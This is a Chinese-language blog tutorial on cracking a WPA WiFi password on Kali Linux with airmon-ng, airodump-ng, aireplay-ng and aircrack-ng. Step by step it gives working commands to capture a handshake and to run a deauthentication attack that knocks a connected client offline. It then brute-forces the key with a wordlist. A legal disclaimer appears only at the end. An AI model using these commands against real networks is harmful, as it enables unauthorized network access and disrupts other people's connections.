admin管理员组

文章数量:1619291

笔记本有内置的网卡,也可以接外置,这里我用内置网卡做演示写这篇博客

一、检查网卡

使用 airmon-ng 来检测一下网卡是否可用

这里 wlan0 是我的笔记本内置网卡,wlan1 是外置网卡,用不到,不接也可以

二、开启网卡的监听模式

使用 airmon-ng start wlan0 开启网卡的监听模式


开启监听模式后 wlan0 会变成 wlan0mon
再使用 airmon-ng 可以看到

三、扫描环境中的 WiFi

使用 airodump-ng wlan0mon 扫描环境中的 WiFi

这个会一直进行扫描,直到看到有很多扫描到的 WiFi,然后按 Ctrl+c 停止即可

下面我为了方便演示,就破解一个自己的 WiFi,也就是最后那个 weiweinb,记录下要破解 WiFi 的 BSSID 和 CH(信道),也就是 00:90:4C:10:FF:2A 和 11

四、抓取握手包

使用 airodump-ng -c [CH] --bssid [BSSID] -w [抓取的数据包保存的目录] wlan0mon
在这里我应该是使用 airodump-ng -c 11 --bssid 00:90:4C:10:FF:2A -w hack wlan0mon

然后就是显示这个 WiFi 的信息和连接这个 WiFi 的用户

有用户重新连接到这个 WiFi 时,就会获取到数据包,成功抓取到数据包第一行时间右边会有提示

同时在我们的文件里也有了抓到的数据包这些文件,hack-02 就是,hack-01 是之前的,如果没有抓到数据包也是会有文件,但是文件不可以使用

那么问题就来了,谁闲的没事会重新连接方便让你抓包呢。。。
对于抓不到包的 WiFi,可以先把连接他的用户打掉,然后他就会重新连接上来,然后就可以抓到包了

使用 aireplay-ng -0 [发送的数据包数量] -a [BSSID] -c [STATION] wlan0mon
说白了就是疯狂像连接这个 WiFi 的指定用户发送数据包,使他掉线(应该是这样)
我这里应该使用 aireplay-ng -0 10 -a 00:90:4C:10:FF:2A -c B8:37:65:D9:7E:11 wlan0mon

如果 10 条不够就加多点即可

然后就是进行破解了,也就是跑字典

五、破解(跑包)

使用 aircrack-ng -a2 -b [BSSID] -w [字典文件] [抓到的数据包]
kali系统是自带一些字典的,在 /usr/share/dirbuster/wordlists 目录下,可以直接拿来用
在这里我自己找了一个比较常用的简单的字典
使用 aircrack-ng -a2 -b 00:90:4C:10:FF:2A -w ./桌面/aiHuanying/普通默认常用字典.txt hack-02.cap


因为密码比较简单,也是不到一秒就破解出来了,我这里也只是教个方法,字典里没有的话跑死也跑不出来。。。

其他命令

查看所有网卡状态 ifconfig
关闭网卡监听模式 airmon-ng stop wlan0mon

提醒:私自破解他人 WiFi 属于违法行为,该教程只用于学习交流,出现任何问题后果自负与作者无关

❀❀❀❀❀❀ 完结散花 ❀❀❀❀❀❀

本文标签: 字典KaliLinuxwifi